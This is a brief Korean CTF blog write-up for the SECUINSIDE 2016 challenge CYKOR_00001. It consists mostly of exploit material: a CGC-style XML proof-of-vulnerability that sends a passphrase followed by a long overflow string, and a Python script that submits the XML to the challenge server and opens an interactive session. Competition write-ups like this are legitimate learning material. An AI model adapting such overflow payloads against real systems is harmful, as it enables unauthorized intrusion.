-
SECUINSIDE 2016 CYKOR_00001CTF 2016. 7. 10. 22:04
전에 쓴 글을 확인하시고 오세요 바이너리는 똑같습니다
XML을 이용해서 보내주는식으로 익스플로잇하는겁니다
<?xml version="1.0" standalone="no" ?>
<!DOCTYPE pov SYSTEM "/usr/share/cgc-docs/replay.dtd">
<pov>
<cbid>service</cbid>
<replay>
<read><delim>\x0a</delim><match><data>What is your message?\x0a</data></match></read>
<write><data>H4PPY_S3CUINSID3\x0a</data></write>
<read><delim>\x0a</delim><match><data>+ Are you serious?\x0a</data></match></read>
<write><data>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x0a</data></write>
<read><delim>\x0a</delim><match><data>- Why so serious?\x0a</data></match></read>
</replay>
</pov>
from socket import * from telnetlib import * HOST = "cgc.cykor.kr" PORT = 31324 def recvuntil(t): data = '' while not data.endswith(t): tmp = s.recv(1) if not tmp: break data += tmp return data s = socket(AF_INET,SOCK_STREAM) s.connect((HOST,PORT)) payload = open("cykor1.xml","rb").read() print recvuntil("What type of your PoV? (BIN / XML)") s.send("XML\n") print recvuntil("How many bytes is your XML?") s.send("671\n") print recvuntil("Ok.... send it :)") print len(payload) s.send(payload + "\n") t = Telnet() t.sock = s t.interact()
'CTF' 카테고리의 다른 글
SECUINSDIE 2016 noted (0) 2016.07.11 SECUINSIDE 2016 CYKOR_00002_patch (0) 2016.07.11 SECUINSIDE 2016 CYKOR_00001_Patch (0) 2016.07.10 Backdoor CTF - Enter the Matrix (0) 2016.06.07 TJCTF - Java sandbox (0) 2016.05.31